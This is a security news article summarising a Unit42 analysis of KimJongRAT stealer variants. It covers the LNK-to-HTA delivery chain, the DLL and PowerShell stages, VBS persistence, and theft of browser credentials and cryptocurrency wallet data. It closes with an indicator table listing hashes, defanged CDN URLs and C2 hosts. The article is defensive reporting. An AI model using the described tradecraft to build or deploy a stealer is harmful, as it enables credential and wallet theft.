New KimJongRAT Stealer Leverages Weaponized LNK File to Deploy PowerShell Dropper

A new wave of KimJongRAT stealer variants has been identified, showcasing advanced delivery, persistence, and information theft techniques.

Both PE and PowerShell-based versions were observed, with attack chains initiated via malicious Windows shortcut (LNK) files.

Upon user interaction, these LNK files trigger the download and execution of multi-stage payloads from attacker-controlled content delivery networks (CDNs), leveraging legitimate services to evade detection.

Technical Details of the PE Variant Chain

The PE variant utilizes a staged approach. The attack commences when a victim opens a weaponized .LNK file, which, using Windows utilities such as cmd.exe and curl.exe, downloads a disguised HTML Application (HTA) file from a legitimate CDN provider.

KimJongRAT Stealer
Execution related LNK information

The HTA file, embedded with obfuscated VBS code, drops three files: a decoy PDF, a text file with payload URLs, and a 64-bit DLL loader.

The loader, named sys.dll, executes further file retrieval using RC4-encrypted payloads specified in the text file, ultimately deploying stealer and orchestrator components (net64.log and main64.log).

These components implement extensive reconnaissance and exfiltration capabilities, including browser data, system information, email and FTP credentials, and files of interest (such as cryptocurrency wallet data).

The orchestrator communicates with the attacker’s command and control (C2) infrastructure, uploading compressed and XOR-encrypted archives of stolen data, and supporting further attacker commands via HTTP POST and GET requests.

Custom encoding and encryption routines obscure both strings and data, complicating analysis and detection.

For instance, API call strings are encoded using a substitution cipher, and exfiltrated archives are XORed prior to network transmission.

PowerShell Variant

The PowerShell variant mirrors the overall execution flow of the PE version but relies on an embedded ZIP archive containing a PowerShell stealer and a VBS persistence script.

KimJongRAT Stealer
Malware execution chain of the latest KimJongRAT PE variant 

Upon execution, the dropper opens a decoy PDF, extracts the ZIP archive, and runs the main PowerShell script.

According to Unit42 Report, this script performs anti-VM checks, establishes persistence via registry keys, and collects exhaustive system and browser data.

Particularly notable in the PowerShell stealer is its focus on cryptocurrency assets. The script parses the directories of popular browsers (Chrome, Edge, Naver Whale, Firefox) to extract credentials, cookies, and sensitive files.

It systematically searches for browser extensions associated with cryptocurrency wallets such as MetaMask, Trust Wallet, TronLink, and others copying extension data and configuration files for exfiltration.

All harvested content is compressed and uploaded to the attacker’s C2 using chunked HTTP POSTs.

The persistent VBS script ensures the stealer is automatically executed at user logon, maintaining continuous access for the threat actor.

The backdoor component of the PowerShell variant facilitates subsequent data theft and remote command execution, supporting both file uploads and downloads, additional malware deployment, and interactive command execution.

Since its first description in 2013 and subsequent evolutions, KimJongRAT demonstrates a continuous adaptation to evade defenses and maximize payload impact.

Its multi-file, multi-stage structure, blending native Windows tools, obfuscated scripts, and legitimate Internet services, presents detection and response challenges.

The enhanced focus on cryptocurrency theft signals alignment with broader cybercriminal monetization trends.

Security vendors, including Palo Alto Networks, have updated detection logic to track these evolving threats.

Protection strategies recommended include advanced behavioral monitoring, URL and DNS filtering, and regular incident response exercises.

Organizations should remain vigilant for unusual LNK file activity and unknown outbound connections to suspicious CDNs or dynamic DNS services.

Indicators of Compromise (IOCs)

Indicator TypeValue/Description
Initial LNK SHA256a66c25b1f0dea6e06a4c9f8c5f6ebba0f6c21bd3b9cc326a56702db30418f189 (and others)
First Stage HTA SHA25602783530bbd8416ebc82ab1eb5bbe81d5d87731d24c6ff6a8e12139a5fe33cee (and others)
Second Stage Loader SHA256f4d9547269e0cd7a0df97e394f688e0eb00b31965abd5e6ad67d373a7dc58f3b (and others)
Orchestrator SHA25685be5cc01f0e0127a26dceba76571a94335d00d490e5391ccef72e115c3301b3 (and others)
KimJongRAT Stealer SHA25696df4f9cb5d9cacd6e3b947c61af9b8317194b1285936ce103f155e082290381 (and others)
PowerShell Loader SHA25697d1bd607b4dc00c356dd873cd4ac309e98f2bb17ae9a6791fc0a88bc056195a
PowerShell Stealer SHA256b103190c647ddd7d16766ee5af19e265f0e15d57e91a07b2a866f5b18178581c
PowerShell Keylogger SHA2563c6476411d214d40d0cc43241f63e933f5a77991939de158df40d84d04b7aa78
Persistence VBS File SHA256f73164bd4d2a475f79fb7d0806cfc3ddb510015f9161e7dce537d90956c11393
Attacker CDN URLscdn.glitch[.]global/2eefa6a0-44ff-4979-9a9c-689be652996d/, cdn.glitch[.]global/17443dac-272c-421c-80ac-…
C2 Servers131.153.13[.]235/sp/, secservice.ddns[.]net/service2/, srvdown.ddns[.]net/service3/

Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant Updates

Mandvi
Mandvi
Mandvi is a Security Reporter covering data breaches, malware, cyberattacks, data leaks, and more at Cyber Press.

Recent Articles

Related Stories

LEAVE A REPLY

Please enter your comment!
Please enter your name here